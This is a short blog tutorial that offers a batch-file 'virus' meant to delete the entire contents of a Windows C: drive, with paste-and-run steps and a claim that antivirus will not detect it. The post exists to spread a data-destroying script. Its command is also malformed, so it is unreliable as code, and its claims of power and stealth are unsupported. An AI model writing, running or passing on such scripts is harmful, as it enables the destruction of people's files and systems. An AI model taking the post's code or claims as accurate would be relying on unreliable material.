In my previous post i had taught you guys to make virus that disables mouse and Virus to format hard disc. By this post i will be able to teach you to create simple but terribly powerful otherwise you will say dangerous trojan or vrus using a batch file. No computer coding is needed to create this virus, Notepad is enough for it. The nice issue regarding this virus is it's not detected by any AntiVirus.
What Will This Virus Do ?
You are going to develop this virus using batch file programming. This virus can delete the C: Drive completely. the nice issue regarding this virus is that it's not detected by antivirus. If you would like to find out additional regarding batch programming visit my post regarding Learn Batch Programming.
Develope The Virus
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name it any other way however .bat is must)
3. Now, running this file can delete all the content of C Drive.
Warning: Please do not try and run on your own pc instead it'll delete all the content of your C Drive. i will be able to not be liable for any harm done to your pc.
0 comments:
Post a Comment